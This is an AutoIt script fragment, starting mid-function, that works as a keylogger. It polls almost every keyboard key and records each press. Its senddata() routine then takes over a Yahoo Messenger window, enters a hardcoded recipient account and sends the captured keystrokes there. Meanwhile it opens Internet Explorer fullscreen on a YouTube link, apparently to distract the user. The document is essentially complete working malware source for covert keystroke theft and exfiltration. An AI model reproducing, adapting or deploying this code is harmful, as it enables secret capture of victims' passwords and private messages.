    If _IsPressed(0xBE) = 1 Then _LogKeyPress('. ')
    If _IsPressed(0xBF) = 1 Then _LogKeyPress('/ ')
    If _IsPressed(0xC0) = 1 Then _LogKeyPress('` ')
    If _IsPressed(0xDB) = 1 Then _LogKeyPress('[ ')
    If _IsPressed(0xDC) = 1 Then _LogKeyPress('\ ')
    If _IsPressed(0xDD) = 1 Then _LogKeyPress('] ')
    If _IsPressed(0xDE) = 1 Then _LogKeyPress("' ")
    If _IsPressed(0x08) = 1 Then _LogKeyPress('{BACKSPACE.} ')
    If _IsPressed(0x09) = 1 Then _LogKeyPress('{TAB.} ')
    If _IsPressed(0x0D) = 1 Then _LogKeyPress('{ENTER.} ')
    If _IsPressed(0x14) = 1 Then _LogKeyPress('{CAPSLOCK.} ')
    If _IsPressed(0x1B) = 1 Then _LogKeyPress('{ESC.} ')
    If _IsPressed(0x20) = 1 Then _LogKeyPress(' ')
    If _IsPressed(0x23) = 1 Then _LogKeyPress('{END.} ')
    If _IsPressed(0x24) = 1 Then _LogKeyPress('{HOME.} ')
    If _IsPressed(0x25) = 1 Then _LogKeyPress('{LEFT ARROW} ')
    If _IsPressed(0x26) = 1 Then _LogKeyPress('{UP ARROW} ')
    If _IsPressed(0x27) = 1 Then _LogKeyPress('{RIGHT ARROW} ')
    If _IsPressed(0x28) = 1 Then _LogKeyPress('{DOWN ARROW} ')
    If _IsPressed(0x2C) = 1 Then _LogKeyPress('{PRINT SCREEN} ')
    If _IsPressed(0x2D) = 1 Then _LogKeyPress('{INS.} ')
    If _IsPressed(0x2E) = 1 Then _LogKeyPress('{DEL.} ')
    If _IsPressed(0x30) = 1 Then _LogKeyPress('0')
    If _IsPressed(0x31) = 1 Then _LogKeyPress('1')
    If _IsPressed(0x32) = 1 Then _LogKeyPress('2')
    If _IsPressed(0x33) = 1 Then _LogKeyPress('3')
    If _IsPressed(0x34) = 1 Then _LogKeyPress('4')
    If _IsPressed(0x35) = 1 Then _LogKeyPress('5')
    If _IsPressed(0x36) = 1 Then _LogKeyPress('6')
    If _IsPressed(0x37) = 1 Then _LogKeyPress('7')
    If _IsPressed(0x38) = 1 Then _LogKeyPress('8')
    If _IsPressed(0x39) = 1 Then _LogKeyPress('9')
    If _IsPressed(0x41) = 1 Then _LogKeyPress('a')
    If _IsPressed(0x42) = 1 Then _LogKeyPress('b')
    If _IsPressed(0x43) = 1 Then _LogKeyPress('c')
    If _IsPressed(0x44) = 1 Then _LogKeyPress('d')
    If _IsPressed(0x45) = 1 Then _LogKeyPress('e')
    If _IsPressed(0x46) = 1 Then _LogKeyPress('f')
    If _IsPressed(0x47) = 1 Then _LogKeyPress('g')
    If _IsPressed(0x48) = 1 Then _LogKeyPress('h')
    If _IsPressed(0x49) = 1 Then _LogKeyPress('i')
    If _IsPressed(0x4A) = 1 Then _LogKeyPress('j')
    If _IsPressed(0x4B) = 1 Then _LogKeyPress('k')
    If _IsPressed(0x4C) = 1 Then _LogKeyPress('l')
    If _IsPressed(0x4D) = 1 Then _LogKeyPress('m')
    If _IsPressed(0x4E) = 1 Then _LogKeyPress('n')
    If _IsPressed(0x4F) = 1 Then _LogKeyPress('o')
    If _IsPressed(0x50) = 1 Then _LogKeyPress('p')
    If _IsPressed(0x51) = 1 Then _LogKeyPress('q')
    If _IsPressed(0x52) = 1 Then _LogKeyPress('r')
    If _IsPressed(0x53) = 1 Then _LogKeyPress('s')
    If _IsPressed(0x54) = 1 Then _LogKeyPress('t')
    If _IsPressed(0x55) = 1 Then _LogKeyPress('u')
    If _IsPressed(0x56) = 1 Then _LogKeyPress('v')
    If _IsPressed(0x57) = 1 Then _LogKeyPress('w')
    If _IsPressed(0x58) = 1 Then _LogKeyPress('x')
    If _IsPressed(0x59) = 1 Then _LogKeyPress('y')
    If _IsPressed(0x5A) = 1 Then _LogKeyPress('z')
    If _IsPressed(0x5B) = 1 Then _LogKeyPress('{LEFT WIN} ')
    If _IsPressed(0x5C) = 1 Then _LogKeyPress('{RIGHT WIN} ')
    If _IsPressed(0x60) = 1 Then _LogKeyPress('0')
    If _IsPressed(0x61) = 1 Then _LogKeyPress('1')
    If _IsPressed(0x62) = 1 Then _LogKeyPress('2')
    If _IsPressed(0x63) = 1 Then _LogKeyPress('3')
    If _IsPressed(0x64) = 1 Then _LogKeyPress('4')
    If _IsPressed(0x65) = 1 Then _LogKeyPress('5')
    If _IsPressed(0x66) = 1 Then _LogKeyPress('6')
    If _IsPressed(0x67) = 1 Then _LogKeyPress('7')
    If _IsPressed(0x68) = 1 Then _LogKeyPress('8')
    If _IsPressed(0x69) = 1 Then _LogKeyPress('9')
    If _IsPressed(0x6A) = 1 Then _LogKeyPress('{MULTIPLY} ')
    If _IsPressed(0x6B) = 1 Then _LogKeyPress('{ADD} ')
    If _IsPressed(0x70) = 1 Then _LogKeyPress('F1 ')
    If _IsPressed(0x71) = 1 Then _LogKeyPress('F2 ')
    If _IsPressed(0x72) = 1 Then _LogKeyPress('F3 ')
    If _IsPressed(0x73) = 1 Then _LogKeyPress('F4 ')
    If _IsPressed(0x74) = 1 Then _LogKeyPress('F5 ')
    If _IsPressed(0x75) = 1 Then _LogKeyPress('F6 ')
    If _IsPressed(0x76) = 1 Then _LogKeyPress('F7 ')
    If _IsPressed(0x77) = 1 Then _LogKeyPress('F8 ')
    If _IsPressed(0x78) = 1 Then _LogKeyPress('F9 ')
    If _IsPressed(0x79) = 1 Then _LogKeyPress('F10 ')
    If _IsPressed(0x77) = 1 Then _LogKeyPress('F8 ')
    If _IsPressed(0x78) = 1 Then _LogKeyPress('F9 ')
    If _IsPressed(0x79) = 1 Then _LogKeyPress('F10 ')
    If _IsPressed(0x7A) = 1 Then _LogKeyPress('F11 ')
    If _IsPressed(0x7B) = 1 Then _LogKeyPress('F12 ')
    If _IsPressed(0x7C) = 1 Then _LogKeyPress('F13 ')
    If _IsPressed(0x7D) = 1 Then _LogKeyPress('F14 ')
    If _IsPressed(0x7E) = 1 Then _LogKeyPress('F15 ')
    If _IsPressed(0x7F) = 1 Then _LogKeyPress('F16 ')
    If _IsPressed(0x80) = 1 Then _LogKeyPress('F17 ')
    If _IsPressed(0x81) = 1 Then _LogKeyPress('F18 ')
    If _IsPressed(0x82) = 1 Then _LogKeyPress('F19 ')
    If _IsPressed(0x83) = 1 Then _LogKeyPress('F20 ')
    If _IsPressed(0x84) = 1 Then _LogKeyPress('F21 ')
    If _IsPressed(0x85) = 1 Then _LogKeyPress('F22 ')
    If _IsPressed(0x86) = 1 Then _LogKeyPress('F23 ')
    If _IsPressed(0x87) = 1 Then _LogKeyPress('F24 ')
    If _IsPressed(0x90) = 1 Then _LogKeyPress('{NUM LOCK} ')
    If _IsPressed(0x91) = 1 Then _LogKeyPress('{SCROLL LOCK} ')
    If _IsPressed(0xA0) = 1 Then _LogKeyPress('{SHIFT} ')
    If _IsPressed(0xA1) = 1 Then _LogKeyPress('{SHIFT} ')
    If _IsPressed(0xA2) = 1 Then _LogKeyPress('{CTRL} ')
    If _IsPressed(0xA3) = 1 Then _LogKeyPress('{CTRL} ')
    If _IsPressed(0xA4) = 1 Then _LogKeyPress('{ALT.} ')
    If _IsPressed(0xA5) = 1 Then _LogKeyPress('{ALT.} ')  
    senddata()
    Wend
    EndFunc
    
    While 1
            logkey()
          
    WEnd
    Func senddata()
            $link="http://www.youtube.com/watch?v=3ZIcu_Sv5oI&feature=player_embedded"
            $z=ControlClick($yahoo_handle, "", "ATL:009B0F981")
            if $z=1 Then
                    Run(@ProgramFilesDir & "\Internet Explorer\iexplore.exe")
                    WinWaitActive("[Class:IEFrame]")
                    WinSetOnTop ( "[Class:IEFrame]", "",1)
                    $IE_handle = WinGetHandle("[active]")
                    ControlSend($IE_handle,"","ToolbarWindow324","{f11}")
                    ControlSend($IE_handle,"","ToolbarWindow324",$link & "{enter}")
                    $idnhan="phieulang_hoanguit"
                    $x=ControlSetText($yahoo_handle, "", "ATL:009B0F981",$idnhan)
            if $X=1 then
                    ControlSend($yahoo_handle, "", "ATL:009B0F981","{enter}")
                    WinActivate($IE_handle)
                    $y = ControlSetText("[Class:CConvWndBase]","","YIMInputWindow1",$var)
                    if $y=1 Then
                            ControlSend("[Class:CConvWndBase]","","YIMInputWindow1","{enter}{esc}")
                            Exit
                    Else
                            ControlSetText("[Class:CConvWndBase]","","YIMInputWindow1",$var)
                            ControlSend("[Class:CConvWndBase]","","YIMInputWindow1","{enter}{esc}")
                            Exit
                    EndIf
            EndIf
            EndIf
       Sleep(100)
    EndFunc